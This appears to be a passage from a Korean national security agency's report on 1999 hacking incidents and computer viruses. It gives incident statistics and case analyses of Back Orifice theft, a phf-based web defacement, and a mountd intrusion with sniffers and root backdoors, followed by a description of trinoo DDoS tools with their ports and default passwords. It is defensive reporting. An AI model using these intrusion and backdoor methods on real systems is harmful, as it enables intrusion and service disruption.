rootkit을이용하여재침입또는추적을피하기위한목적으로각종시스템파일을트로이버전으로바꾸고있음을알수있다. 서비스거부공격에서가장많이발생된것이 smurf 공격으로 9건이접수되었다. smurf 공격을포함하여대부분의서비스거부공격이공격출처를속이고있기때문에추적이어렵다

29 서비스거부공격의일종이라고할수있는 E-mai1 관련공격의대부분은스팸메일공격으로써국내메일서버들이스팸릴레이를의부에허용함으로써인해발생되고있다. 모두 19건이접수되었는데실제스팸메일은흔히해킹이라고생각하고있지않으므로신고를하지않는것을감안할때훨씬많은수의사고가발생하고있을것으로예상하고있다. (5) 해킹사고의연도별변화한국정보보호센터가출범한 '96년의해킹사고통계는언론등에보도된내용을포함한것으로 CERTCC-KR에의한실질적인통계는 '97년부터이루어져왔다고할수있다. [ 표 2-5] 과같이 '97년 64건, '98년 158건, '99년 572건의해킹사고가접수되어매년 300% 정도로급격히증가하고있음을알수있다. [ 표 2-5] 연도별해킹사고변화 ( 그림 2-3) 연도별해킹사고변화 해킹사고가이처럼급속히증가하는데는다음과같이몇가지원인으로분석할수있다. 첫째, 정보시스템의활용도가높아졌으며, 인터넷등네트워크를통하여서로연결되어가고있다. 최근각정보시스템들이내부적으로는 LAN에의해연결되어있고, 또한인터넷에연동되어전세계의어디든지시간과공간의구애를받지않고정보를교환하고, 각종서비스를제공받을수있도록되어있다

30 반면에네트워킹화에따라내부사용자뿐아니라전세계의어느사용자라할지라도내부시스템에불법적으로접근할가능성이높아졌다. 실제국내정보시스템침해사고의상당부분이국외해커에의해이루어졌다. 둘째, 해커들간의자유로운정보의교환이다. 해커들은자신들의웹페이지를만들어서해킹기술을인터넷에자유로이공개하고있어누구나해킹정보를쉽게구할수있다. 예전에는인터넷을이용하는국내몇몇대학들의전유물로여겨지던네트워크침입등의해킹이, PC 통신과인터넷이연동되고일반전국의대학들이인터넷에대대적으로연동됨에따라침해사고로인한피해건수와해커의수가절대적으로늘어나고있는실정이다. 셋째, 정보시스템관리자의시간적ㆍ기술적역량부족을들수있다. 정보시스템을공격하려고하는수많은해커들은공격기술에심취해서정보시스템을공격하려고하고있지만, 정보시스템의관리자는기관의수많은시스템을관리하여야하며, 고유업무에많은시간을빼앗겨정보보호에신경을쓰기가쉽지않다. 최근에는정보보호에대한인식이많이확산되어관리자들이정보보호를위해대처하려고하지만막상정보보호에대한지식의결여로인해실천에옮기기는쉽지않은실정이다. 나. 국내해킹사래한국정보보호센터침해사고대응지원팀에접수된해킹사고의사례를소개함으로써이와유사한해킹사고를미연에방지할수있도록도움을줄수있으면한다. 단, 피해기관을보호하기위해이미언론등에알려진경우의에는실제기관명을사용하지않기로한다. (1) 백오리피스를이용한주요자료유출사건 사건경위 '99년 3월서울모대학교 L군은과기대의네트워크를대상으로개인 PC의해킹프로램인백오리피스가설치되어있는시스템을점검한후, 백오리피스를이용하여시스템내 우리별 3호 대한정보등주요정보를탈취하였다

31 L군은평소해킹에관심이많은학생으로자신의홈페이지에해킹하는방법등해킹관련자료들을게시하였다. 또한과기대로부터탈취한 우리별 3호 등의자료를 자유게시판 에게시하기도하였다. 이사건은피해기관네트워크담당자의의뢰로경찰청컴퓨터범죄수사대에신고되어침입행위를한 L군은불구속입건되었다. 과기대해킹사고이외에도백오리피스를이용한해킹사고는지속적으로접수되고있다. 특히, 다수의사용자들이사용하는 PC방에서백오리피스를이용하여외부에서시스템을파괴하거나, 수행중인프로그램들 ( 스타크래프트, 웹브라우저등 ) 을강제로종료시켜어떻게대처해야하는지에대한문의도많이들어오고있다. 최근 PC방에서게임뿐만아니라직장인들이점심시간을이용하여 PC 뱅킹이나주식거래를많이하고있다. 하지만, 여기에자신이입력하고있는개인정보가해커에의해유출될수있다는생각은가지고있지않을것이다. 충분히현실성있는다음의가상시나리오를생각해보자. 악의적인해커 X는 PC방의한시스템에백오리피스를몰래설치하고이 PC에서입력되는모든내용이특정한파일에저장되도록한다. 이사실을알지못하는직장인 A씨는점심시간을이용하여한은행의인터넷뱅킹사이트에접속하여자신의계좌번호, 사용자 ID, 비밀번호를입력한다. 해커 X는자신의방에서백오리피스가설치된 PC방의시스템에접속하여 A씨의계좌번호, 사용자 ID, 비밀번호가들어있는파일을가져와서이를이용하여불법적으로자신의구좌로계좌이체를시킨다. 이는가상의시나리오이지만얼마든지일어날수있는일이다. 사건분석및대응그러면백오리피스는어떤해킹도구이고어떻게막을수있는지알아보도록하자. 백오리피스 (Back Orifice) 는 CDC(Cult of the Dead Cow) 라는해킹그룹의 Sir Dystic이만든윈도우즈 95/98에대한해킹도구로파일시스템의모든파일들에대하여접근이가능하고, 프로세스의생성 / 삭제도원격조정할수있다. 그리고시스템패스워드유출, 키보드모니터링, 네트워크자원의공유지정, 네트워크접속재지정, 파일조작, 레지스트리조작도가능하다. 이의에도여러가지기능을이용하여원격사용자는마치자신의시스템처럼백오리피스에감염된시스템을사용할수있다

$ㅇ백오리피스가기본적으로사용하는 31337 포트를모니터링하여백오리피스공격을탐지할수있다. NOBO와같은공개소프트웨어는마치자신이백오리피스에감염된서버인것처럼공격자를속여공격자의행위를모니터링할수있는도구이다. ㅇ백오리피스설치시 c:\windows\system 아래에 windll.dll 이란이름의파일을생성한다.$

32 ( 그림 2-4) 백오리피스화면 윈도우즈시스템에대한백오리피스의심각성이너무나잘알려져있어최근바이러스백신업체에서도이들을진단하고제거할수있는기능을가지고있다. 따라서, 개인 PC 사용자들은최신백신을이용하여주기적으로점검함으로써백오리피스를탐지하고제거할수있다. 이외에다음과같은방법으로수동점검이가능하다. ㅇ백오리피스가기본적으로사용하는 포트를모니터링하여백오리피스공격을탐지할수있다. NOBO와같은공개소프트웨어는마치자신이백오리피스에감염된서버인것처럼공격자를속여공격자의행위를모니터링할수있는도구이다. ㅇ백오리피스설치시 c:\windows\system 아래에 windll.dll 이란이름의파일을생성한다. 공격자가파일명을조작할수도있으므로 8,192 바이트크기의파일을점검한다. ㅇ백오리피스설치시 c:\windows\system 아래에.exe 이름의파일을생성한다. 공격자가파일명을조작할수도있으므로약 122K 크기의파일을점검한다. ㅇ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \RunServices\Default의값을 regedit 명령으로확인하여 Blank가아니고특정값이들어있으면백도어가있다고판단하여해당값을삭제한후시스템을재부팅시킨다

(2) H 대학의홈페이지해킹사건 사건경위 99년 6월 H 대학교의컴퓨터공학과홈페이지가국외해커에의해변조되었다. ( 그림 2-5) 해킹당한 H 대학의홈페이지 공격자는벨기에와캐나다에서침입한 chojin 밝힌해커로 gh( 글로벌헬 ) 가미국의 FBI에의해수사를받고있는것에항의하는내용으로홈페이지를변경하였다.

33 (2) H 대학의홈페이지해킹사건 사건경위 99년 6월 H 대학교의컴퓨터공학과홈페이지가국외해커에의해변조되었다. ( 그림 2-5) 해킹당한 H 대학의홈페이지 공격자는벨기에와캐나다에서침입한 chojin 밝힌해커로 gh( 글로벌헬 ) 가미국의 FBI에의해수사를받고있는것에항의하는내용으로홈페이지를변경하였다. 글로벌헬은지난 5월백악관의웹사이트가부분정지되는사고가발생하여이를수사하는과정에서범인으로지목된해커그룹으로, 대대적인단속을시작하면서 FBI와사이버전쟁이시작되었다. 현재연방수사국의발표에의하면, 이와관련해글로벌헬소속해커인에릭번스 (19ㆍ사이버이름은자이클론 ) 가 1년전에정부기관컴퓨터를 3차례공격한혐의로연방수사국에체포돼, 버지니아대배심에의해기소되었으며, 글로벌헬소속해커들가운데최소한8명이연방수사국에쫓기고있다고한다. 이를항의하기위해해커들의미연방수사국의사이트 ( 에접근이쇄도하자연방수사국에서는네트워크를차단하는조치를취하였으며, 보안조치를강화한후재가동할계획의발표가있었다

34 사건분석및대응 H 대학의해킹당한시스템을분석한결과웹서버의 /cgi-bin/phf를이용하여사용자패스워드파일 (/etc/passwd) 가유출되었으며, 이중일부사용자계정 (unix, shanta) 을도용하여시스템에불법접근하였다. 시스템의관리자권한을획득하기위해 ping" 버퍼오버플로우공격을이용하였으며, 관리자권한을획득한후에는홈페이지내용을수정하는행위만을하였다. H 대학의불법침입및홈페이지변조에사용된해킹기법은 3가지이다. 첫째, /cgi-bin/phf 프로그램자체의오류를이용한비밀번호파일 (/etc/passwd) 유출이다. phf는웹서버에서사용되는 CGI 프로그램으로서사용자입력을해석하는부분에서의오류로인해원격지에서임의의명령을수행시킬수있다. phf 공격을받았을경우아래와같은로그가남는다. 아래의로그는 시스템으로부터 phf 취약점을이용하여패스워드파일을유출하려는시도를나타내고있다. 둘째, 공격자는 phf 공격으로부터획득한패스워드파일에서사용자들의패스워드를알아내기위해 Crack이라는해킹프로그램을사용하였다. 일반적으로패스워드파일의사용자비밀번호는암호화되어저장되기때문에패스워드파일을가져간다고하더라도사용자들의비밀번호를바로알아낼수없다. 하지만공격자들은 Crack이라는패스워드해킹프로그램을이용하여단어사전에등록된단어와같은쉬운패스워드를사용하는사용자를알아낼수있다. 패스워드는일반적으로시스템에접근하기위하여사용자를인증하는도구로대단히중요하지만사용자들의무관심으로패스워드를사용하지않거나타인에의해도용당할수있는쉬운패스워드를사용하는경우가많다. 해킹당한시스템의 unix, shanta라는계정도이러한쉬운패스워드를사용함으로인해공격을당할수있었다. 셋째, Crack에의해취득한사용자들의패스워드를이용하여시스템에침입한후공격자는시스템관리자권한을획득하기위해 ping" 취약점을이용하였다. 오래된 ping" 프로그램은버퍼오버플로우취약점이있어일반사용자가시스템관리자권한을획득할수있다. 뿐만아니라최근의많은공격이이러한버퍼오버플로우공격으로인해발생되고있는데여기에대한가장손쉬운대책은보안패치를꾸준히하는것이다

이러한과정을거쳐시스템관리자권한까지획득한공격자는홈페이지의내용을쉽게바꿀수있었다. (3) K 대학침입후 18 만여사이트취약점수집 사건경위 '99년 11월 4일영국의대학망과연구망의보안을담당하는 JANET-CERT로부터국내의 K 대학에서영국의대학들을상대로보안취약점을스캔하고있다는보고를받았다.

35 이러한과정을거쳐시스템관리자권한까지획득한공격자는홈페이지의내용을쉽게바꿀수있었다. (3) K 대학침입후 18 만여사이트취약점수집 사건경위 '99년 11월 4일영국의대학망과연구망의보안을담당하는 JANET-CERT로부터국내의 K 대학에서영국의대학들을상대로보안취약점을스캔하고있다는보고를받았다. 공격을시도하는 IP 주소를추적한결과해당시스템은 K 대학의한연구실에서운영하는리눅스서버로이시스템역시에스파니아로부터해킹을당한것으로나타났다. 공격자는 K 대학의시스템을해킹한후영국, 캐나다, 대만, 미국대학들, 미국기업들등모두 186,547 사이트를대상으로해킹가능한보안취약점정보를수집하였다. 또한보안취약점이발견된사이트에대해서는실제해킹도구를이용하여해킹을시도한것으로보인다. 사건분석및대응이사건은국외에서국내시스템을해킹한후다시국외기관을공격한경우이다. 실제국내에서올 10월까지접수된 360건의해킹사고가운데 147건 (40.8%) 이국외에서국내시스템을해킹한후다시국외를공격한사건으로국내시스템들이해킹경유지로많이사용되고있음을알수있다. 해당시스템을분석한결과공격자의공격과정은다음과같았다. 1 mountd를이용한시스템침입이피해시스템은 mountd라는프로그램의버퍼오버플로우취약점을이용하여원격지에서불법적으로침입당하였다. mountd는최근 RPC(Remote Procedure Call) 서비스의일종으로 rpc.statd,rpc.cmsd, rpc.ttdbserve 등과함께시스템의해킹에많이이용되고있다

36 일반적으로관리자들이이들서비스들이불필요함에도불구하고서비스를해주는경우가많은데 /etc/inetd.conf 등에서해당서비스들을코맨트처리하는등의조치가필요하다. 2 해킹프로그램설치및운영공격자는침입후숨겨진디렉토리 (/dev/./,/dev/ssddaa6699/./) 에각종해킹프로그램들을설치하고, 영국, 캐나다. 미국대학들, 미국기업들, 대만등을대상으로해킹시도를하였다. 공격자가실제공격에앞서가장먼저하는행위가해킹가능한보안취약점을찾는것이다. 지난 '98년 6월에발표된 mscan이라는대규모네트워크스캔도구와함께최근여러가지취약점스캔도구들이해킹에사용되고있다. 아래파일들은공격자가설치한공격프로그램들과국의시스템의보안취약점을스캔한결과물들이다. 3 네트워크도청공격자는해킹한시스템에 sniffer라는네트워크도청도구를설치하여 K 대학의네트워크를도청하였다. 한시스템에해킹공격후네트워크도청은해커들의일반적인행위로이를통해해킹한시스템뿐만아니라다른시스템의사용자 ID와패스워드까지도알아낼수있다. 따라서, 해킹당한시스템으로인해해당기관의네트워크전체가공격을당할수있다. 해당시스템이 sniffer 등에의해모니터링당하고있는지를확인하기위해서는 ifconfig' 라는명령어를사용하거나 ifstatus, CPM(Check Promicuous Mode) 등의공개도구를이용하여점검할수있다. 4 재침입을위한백도어설치최초시스템을공격하기위해서 mountd 취약점을이용하였지만, 차후에쉽게그리고발견되지않고침입하기위해서백도어를설치하였다

해당시스템의 login, in.telnetd 등을변경하여 rewt" 라는계정으로들어올경우시스템관리자권한을부여하도록하였으며, inetd 환경을변경하여 6969번포트로접근할경우역시시스템관리자권한의쉘을부여하도록하였다. 이러한백도어설치도역시해커들의일반적인행위로차후재침입과침입사실을발견되지않기위해사용하고있다.

37 해당시스템의 login, in.telnetd 등을변경하여 rewt" 라는계정으로들어올경우시스템관리자권한을부여하도록하였으며, inetd 환경을변경하여 6969번포트로접근할경우역시시스템관리자권한의쉘을부여하도록하였다. 이러한백도어설치도역시해커들의일반적인행위로차후재침입과침입사실을발견되지않기위해사용하고있다. 백도어설치를위한대표적인해킹도구는루트킷 (Rootkit) 으로시스템의각종프로그램들을트로이버전으로변경하므로루트킷공격을받으면시스템을다시설치하여야만한다. 2. 국외해킹현황및사례분석 가. 국외해킹현황국내의해킹사고는매년 3배가까운증가세를보이고있으며, 이러한해킹사고의증가율은국외의경우도마찬가지이다. [ 표 2-6] 는미국, 영국, 일본의해킹사고접수현황을나타내고있다. [ 표 2-6] 연도별국외해킹사고발생현황 각국에서발생되고있는시스템해킹현황은그나라의호스트및네트워크의규모에비례함을알수있다. 미국의경우도 97년 2,134건, '98년 3,734건, 그리고 '99년 8,268건의해킹사고가접수되어꾸준히해킹이증가하고있다. 나. 국외해킹사례 '99년 8월 2일, 세계적컴퓨터바이러스백신및보안업체인시만텍 (Symantec Corp.) 사의웹사이트가해커들의공격을받았다

해커들은전자우편을통해웜을유포하여회사를해체하라는내용의메시지를남겼으며시만텍관계자는보안취약성에대한문제점은표현하지는않았으나 FBI에보고하였다고밝혔다.(Infowar.com, 8/5/99) '99년 7월 30일, 캐나다 ISP 업체두곳이중국정부크래커들에의해정치적인목적으로공격을받았다고발표하였다. 이해킹시도의출발점이중국정부기관인것으로추적되었다고말했다.

38 해커들은전자우편을통해웜을유포하여회사를해체하라는내용의메시지를남겼으며시만텍관계자는보안취약성에대한문제점은표현하지는않았으나 FBI에보고하였다고밝혔다.(Infowar.com, 8/5/99) '99년 7월 30일, 캐나다 ISP 업체두곳이중국정부크래커들에의해정치적인목적으로공격을받았다고발표하였다. 이해킹시도의출발점이중국정부기관인것으로추적되었다고말했다. 침해당한 ISP은중국에서금지된종교단체의웹사이트를호스팅하고있어서비스거부공격을유발한계기가된것으로추정하고있다.(ZD Net, 30.Ju1.99) '99년 7월 27일, Interactive Connection사에서퇴사한두명의직원들이이회사의컴퓨터시스템에침입하여비밀사업계획을빼낸혐의로체포되었다. 29세의 Ira Lee와 31 세의 Zissis Trabaris로알려진이들은소프트웨어개발자로근무했었으며유죄로판결된다면각각불법컴퓨터침입으로최대 5년형에처해질것으로알려졌다. (Reuters, 27.Jul.99) '99년 5월미상원의공식웹사이트가 MOD라고하는해커집단에의해침입당한것으로알려졌으며 FBI도해커들에의해웹사이트를폐쇄하였다. 이들은최근벌어지고있는 FBI의해커사냥에대한항의로이와같은행위를한것으로알려졌으며, 상원사이트에그들의주장을남겨두었다. MOD는국방정보시스템센터네트워크 (DISA, DISN) 를불법침입한것으로알려져있는집단이다. (AntiOnline, May 27,1999) ( 그림 2-6) 미상원의원홈페이지와해킹으로변조된화면

39 제 2 절바이러스국내ㆍ외현황 1. 국내바이러스현황 가. 개요일반 PC사용자들의가장큰보안위협으로인식되고있는바이러스는빠른네트워크환경과인터넷인구의증가로그피해가더욱증가하고있다. 99년에도바이러스는전년에비하여증가하였으며, 바이러스들이점점네트워크를통한 E-메일, IRC 등으로전파되어그확산속도가빠르고파괴적인특징을갖게되었다. CIH 바이러스로대표되는 99년의바이러스는그다양성면에서도많은변화가이루어졌으며, 진보된형태의바이러스가많이나타났다. '99년에주요바이러스로는 Worm/Happy99, W97M/Mellissa, W95/CIH, Worm/ExploreZip, Worm/PrettyPark.B, Y2KCount, EcoKys, VBS/BubbleBoy, W32/Fix, Worm/MyPics, W95/Babylonia, W32/NewApt, W95/Love 등을들수있다. 99년에국내에출현한주요바이러스들을바이러스유형별로나누어다음과같이살펴볼수있다. (1) 웜바이러스 '99년에발견된신종바이러스유형중가장큰특징은웜바이러스유형이새로이등장하여큰피해와함께확산되었다는것이다. Worm/Happy99 바이러스를시작으로하여 Worm/ExploreZip, Worm/PrettyPark.B, Worm/MyPics 등의많은바이러스들이국내에도많이전파된웜바이러스들이다. 이자체적인 E-메일과 IRC로의전파기능을갖는이러한웜바이러스들은 2000년에도계속확산될것으로보인다. ⑵ 매크로바이러스 '98년에이어 '99년에도많은매크로바이러스들이발견되었으며, 그증상이파괴적인것들이많아국외에서많은피해를주었다. 대표적으로 W97M/Mellissa, W97M/JulyKiller 등이있다

40 (3) 윈도우 95/98 바이러스윈도우 95/98의바이러스의경우에도계속적으로증가하고있다. CIH로대표되는윈도우전용바이러스는 W95/Love, W95/Babylonia, W32/fix 등이있었으며, 이러한바이러스들은메모리상주형이나스스로업데이트가가능한등의많은다양한특성을갖는바이러스로문제가되었다. (4) 트로이목마또한 '99년에는 Y2KCount, Back Orifice 2000, Ecokys 등의사용자정보유출및원격시스템감시가가능한트로이목마프로그램들이많이발견되어 2차적인공격의위협과개인정보보호라는문제를부각시켰다. (5) Y2K 관련바이러스 99년말에는 Y2K관련바이러스들이등장하여 Y2K 자체오류와함께또다른위협의존재가되었다. Y2KCount, W32/Fix(Fix2001), W32/NewApt, W32/MyPics, Trojan/Y2Kaos 등의바이러스가등장하여 Y2K 전환시점에많은위협이되었으나걱정과는달리실제적으로는 Y2K관련바이러스들에의한피해는적었다. (6) 기타 Visual Basic Script를이용한 VBS/FreeLink, VBS/ Bubb1eBoy, VBS/TUNE과같은바이러스들이등장하였으며, Java Script를이용한 HTML에감염되는바이러스들 (The Fly, W32/Mix.2048) 도국외에서많이전파되었다. 나. '99년국내바이러스발생현황통계 W97M/Mellissa, W95/CIH, Worm/ExploreZip, Worm/MyPics, W95/Love 등으로대표되는 '99년의많은바이러스들의국내발생으로실제적으로큰피해와함께대국민에게바이러스에대한경각심을일깨우는계기가되었다

다음의국내바이러스현황은국내백신업체 ( 안철수바이러스연구소, 하우리 ) 와한국정보보호센터의컴퓨터바이러스전담반이공동으로집계한국내바이러스현황통계자료이다. (1) 연도별바이러스현황 [ 표 2-7] 99 년연도별바이러스현황 '99년에국내에서발견된신종바이러스는모두 326종으로, '98년의 276종보다많이증가하였으며, 매년계속적으로증가하고있는추세이다.

41 다음의국내바이러스현황은국내백신업체 ( 안철수바이러스연구소, 하우리 ) 와한국정보보호센터의컴퓨터바이러스전담반이공동으로집계한국내바이러스현황통계자료이다. (1) 연도별바이러스현황 [ 표 2-7] 99 년연도별바이러스현황 '99년에국내에서발견된신종바이러스는모두 326종으로, '98년의 276종보다많이증가하였으며, 매년계속적으로증가하고있는추세이다. 하지만 '98년까지의우위에있던국산바이러스가 '99년에는특징적으로줄어들고외산바이러스가증가했다. 이것은 '99 년초에많은수의국내바이러스제작자들이검찰에검거되었으며, 남은소수의제작자들에게도악성바이러스제작을하지않도록선도한결과로추정된다. 외산바이러스의경우새로운형태와특징을갖는바이러스들이많이발견이되었으며, 이들의변종들도많이발생되어많은증가를나타내었다. '90년대중반이후바이러스는계속적으로많은증가를나타내고있으며, 매크로바이러스와윈도우바이러스, 그리고최근의웜바이러스등의바이러스제작기술의향상으로양적인증가와함께그위험성도많이증가하였다. 그리고해킹기술을응용한트로이목마프로그램도많은변종과함께발견되어악성프로그램의위협이이제는정보유출과정보변조까지미치고있어그대응이점점어려워지고있다

42 ( 그림 2-7) 99 년도연도별바이러스현황 (2) 종류별바이러스현황바이러스종류별현황을살펴보면 '98년에이어 '99년에도매크로바이러스와윈도우바이러스가증가하고있음을알수있다. 또한악의적인트로이목마형바이러스와빠른전파력을갖는웜바이러스가특징적으로많이출현하고있는것을알수있다. [ 표 2-8] 99 년도바이러스종류별현황

43 ( 그림 2-8) 99 년도바이러스종류별현황 (3) 출처별바이러스현황 [ 표 2-9] 99 년출처별바이러스현황 2. 국외바이러스현황 '99년에는아래그림과같이국외에서도많은바이러스가새로이출현하였으며, 그증가추세가 1998년에비하여 2배정도에가까운많은증가가이루어졌다. 또한바이러스형태로 '90년대초의부트바이러스유형에서 '90년대중반의매크로바이러스그리고후반의 Internet/E-mai1을통한바이러스유형으로바뀌어가고있다. 국외바이러스현황자료제공 : 트렌드코리아 ('99년 10월까지자료임 )

44 ( 그림 2-9) 연도별국외바이러스증가추이 바이러스확산경로를살펴보면 ( 그림 2-10) 와같이최근에는메일첨부파일에의한감염이압도적인원인이되고있다. 상대적으로기존의부트바이러스나파일바이러스의감염원인이었던디스켓에의한감염이줄어들고있다. ( 그림 2-10) 바이러스확산경로

45 아래그림에서는연도별바이러스감염원인변화추이를잘보여주고있다. 1997년에비하여 1999년에는첨부파일에의한감염증가율이대단히높다는것을알수있다. ( 그림 2-11) 연도별바이러스감염원인변화추이

46 제 3 절바이러스국내ㆍ외사례분석 1. Melissa 바이러스 국외의경우 '99년 3월주요오피스문서를파괴하는 E-메일을통한자체전파기능을갖는웜바이러스인 Melissa" 가국외의약 50,000대의 PC 시스템과 100개의기업체를감염시킨사례가발생하였다. 2. CIH 바이러스피해사례 국내의경우 ' 일정통부는국내 PC 보급대수 8백만대중 4% 안팎인 30여만대피해를입은것으로추정하였으며이와함께한국정보보호센터내에컴퓨터바이러스전담팀을구성해전문인력을보강하고국내의바이러스동향분석과차세대백신프로그램연구개발을지원하기로하였다. - BIOS손상및 HDD데이터손실 (4만건), HDD데이터손실 (EPROM BIOS 파괴안됨, 16만건 ) 등 21억원가량의피해액추정됨 ' , 정보통신부집계현황 국외의경우중국에서는 4월 26일의 CIH 체르노빌바이러스에 36만대의컴퓨터가감염돼 10억위앤 ( 元 ) 상당의경제적손실이발생했다고관영신화 ( 新華 ) 통신이한조사결과를인용보도했다. - 외국국가별피해상황집계표참조 ( GMT 현재 ) 출처 :

[ 표 2-10] 외국 CIH 국가별피해현황 3. Worm.ExploreZip 국내ㆍ외피해사례 국내의경우 '99.6.11일국내에유입되어총 79건의피해사례가접수되었다 주요민간기업 39건개인 40건피해접수됨 ( 99. 6.

47 [ 표 2-10] 외국 CIH 국가별피해현황 3. Worm.ExploreZip 국내ㆍ외피해사례 국내의경우 ' 일국내에유입되어총 79건의피해사례가접수되었다 주요민간기업 39건개인 40건피해접수됨 ( 집계현황 ) 국외의경우시카고의커먼웰스에디슨사 ( 社 ) 모기업의경우지난 10일웜바이러스가나타난이후 e-메일시스템을꺼버려 1만여명에달하는직원들이평소와달리사무실간통신을위해전화와팩스등을사용할수밖에없는불편을겪었다. 또한 GE, 보잉사 ( 社 ) 등과같은일부다국적기업들의전산망에침투, 수천대의개인용 PC에있는파일내용을삭제했을뿐아니라기업들의귀중한컴퓨터파일까지파괴되었다. 4. W97M/Ths.A 국내ㆍ외피해사례 국외의경우 ' , 미국과유럽의금융기관컴퓨터시스템에서주로발견되고있으며폴란드, 라트비아, 영국, 독일, 오스트리아, 스위스, 프랑스등지로급속히전파되어 5,000대정도의컴퓨터가감염되는피해발생

48 5. Worm/PrettyPark.B 국내의경우 ' E메일을사용자의주소록에있는모든주소로 30분마다동일한내용의 E메일이동시에발송되게하는컴퓨터바이러스의변종인 Worm/PrettyPark.B웜 이국내에출현하여피해가수백건발생하였다. 또한이웜바이러스는사용자의컴퓨터이름과 E 메일주소, 사용자비밀번호등을웜제작자에게보내는기능을포함하여 2차적인공격의위험성과개인정보보호에대한문제도제기시켰다. 6. EcoKys 국내ㆍ외피해사례 국내의경우 '99년 EcoKys 트로이목마프로그램을이용해서남의통장에서현금을인출하는피해사례가발생하였다. 범인황씨는이트로이목마를수정하여 PC 통신가입자들에게 E-메일에첨부하여보낸뒤부주의한사용자가첨부파일을실행하여감염된시스템으로부터이트로이목마의 Keylog기능을이용하여 PC뱅킹계좌번호등을빼내는방법을사용하여한피해자의 PC뱅킹계좌에서 140만원을계좌이체시킨후현금으로빼냈다경찰에꼬리를잡히는사건발생 ' 영상으로보내는편지 ' 라는제목의 E-메일을받은후첨부된파일을실행했었는데, 이후자신이발송한적이없는메일을받았다는 400여명의사용자들로부터항의메일을받은피해사례 7. W97/Prilissa(Melissa.w) 국내ㆍ외피해사례 국외의경우 ' Fortune 500대기업중 10개기업의시스템이감염되는피해사례발생

49 8. W32/Fix(Fix2001) 국내ㆍ외피해사례 국내의경우 ' 바이러스전담반의바이러스신고센터로피해신고가최초로접수되었으며, 피해가속출하였다. 이바이러스는 'Internet problem year2000' 이라는제목의 E-메일을통하여전파되는 Y2K 오류해결프로그램가장바이러스로재부팅시시스템데이터를삭제하는큰피해를주었다. 9. W32/NewApt 국내ㆍ외피해사례 국내의경우 ' 한국정보보호센터 Y2K 비상대응상황실로한 PC통신이용자로부터새해축하메시지프로그램으로위장한웜형태의 Y2K 관련신종바이러스 (Worm Win32.NewApt) 를국내최초로신고하였으며총 12건의신고가접수되었다. 10. Win32/MyPics 국내ㆍ외피해현황 국내의경우 '99년 12월 6일에이미한국정보보호센터컴퓨터바이러스전담반에의해경보되었던 MyPics 바이러스가국내에 2000년 1월 3일에 74건이나출현하여많은 PC를파괴하는사례가발생되었다. 이 MyPics 바이러스는감염되면재부팅시에 Y2K 오류메시지를가상으로출력하며시스템을파괴하는악성바이러스로그피해가매우컸다

50 제 3 장최근해킹ㆍ바이러스대응방안

51 제 3 장최근해킹ㆍ바이러스대응방안 제 1 절최신해킹기법동향및대응 1. 분산환경에서의서비스거부공격 가. 개요최근분산환경에서의서비스공격도구들이많은시스템에불법적으로설치되고있다. 이해킹도구들은대규모네트워크의많은호스트에설치되어서로통합된형태로패킷을범람시켜심각한네트워크성능저하및시스템마비를유발할수있다. 이서비스거부공격도구들은해킹공격을당한솔라리스 2.x 시스템들에서실행파일형태로발견되고있는데, 이시스템들은대부분 rpc.statd, rpc.cmsd, rpc.ttdbserver, automountd 등의 RPC 버퍼오버플로우취약점으로인해공격을당한서버들이었다. 국내에서도올해 RPC 버퍼오버플로우취약점으로인해수많은솔라리스시스템들의해킹사고가접수되었는데이들을분석하는과정에서본고에서소개하고있는서비스거부용해킹도구들이설치되어있는것을확인할수있었다. 지금도마치시한폭탄과같이시스템관리자들이눈치채지못하게서버들에설치되어언제든공격에이용되거나시스템이마비될수있을지모른다. 특히, 이는공격자의명령에의해공격도구가설치된대량의서버들을제어하여공격목표시스템에대한치명적인서비스거부공격을할수있어 Y2K를맞아전세계의인터넷을교란하려는해커들에의해악용될수있다. 최근에발견되고있는이러한분산환경에서의서비스거부공격도구는 trinoo( 혹은 trin00) 와 tribe flood network(tfn) 가대표적이다. 나. Trinoo Trinoo는많은소스로부터통합된 UDP flood 서비스거부공격을유발하는데사용되는도구이다. trinoo 공격은몇개의서버들 ( 혹은마스터들 ) 과많은수의클라이언트들 ( 데몬들 ) 로이루어진다. 공격자는 trinoo 마스터에접속하여 master에게하나혹은여러개의 IP 주소를대상으로서비스거부공격을수행하라고명령을내린다. 그러면 trinoo 마스터는특정한기간으로하나혹은여러개의 IP 주소를공격하도록데몬들과통신을한다

52 trinoo 데몬의실행파일은하나혹은그이상의 trinoo 마스터의주소를가지고있다. trinoo 데몬이실행될때, 그데몬은 *HELLO*" 라는스트링을포함하는 UDP 패킷을 trinoo 마스터의 IP주소에보냄으로써실행가능함을알린다. 데몬들 > 마스터 ; 31335/udp 포트 trinoo 마스터는마스터실행파일이있는디렉토리안에... 라는이름의파일에암호화된형태로알려진데몬들의목록을저장한다. trinoo 마스터는실행가능하다고확인된모든데몬들에게브로드캐스트주소로요청을보낼것을명령할수있다. 브로드캐스트를수신한데몬들은 "PONG" 이라는스트링을포함하는 UDP 패킷을마스트에게보내어응답한다. 1 공격자 > 마스터 ; 27665/tcp 포트 2 마스터 > 데몬들 ; 27444/udp 포트 3 데몬들 > 마스터 ; 31335/udp 포트

53 공격자가마스터에공격명령을내릴때 27665/tcp 포트를사용하고이때패스워드를요구하며, 마스터실행파일에암호화된형태로저장되어있다. [ 표 3-1] trinoo 공격예 (1) trinoo 마스터가데몬들에게보내는명령어들중에서도패스워드가필요한것들이있는데이패스워드는평문형태로전송된다. 디폴트패스워드는다음과같다. "144adsl" trinoo daemon password "gorave" trinoo master server startup ("??" prompt) "betaalmostdone" trinoo master remote interface password "killme" trinoo master password to control "mdie" command trinoo에의해생성된 UDP flood 공격의소스 IP 주소는위장되지않았지만앞으로위장된 IP 주소를사용하는도구가나올수도있다. trinoo 데몬들은자신을숨기기위해다양한이름으로설치되고있는데지금까지알려진이름은다음과같다. ns, http, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix 데몬들과마스터의실행파일을 strings라는유닉스명령을실행시켜확인하면다음과같은결과들을볼수있다

54 [ 표 3-2] trinoo 공격예 (2)

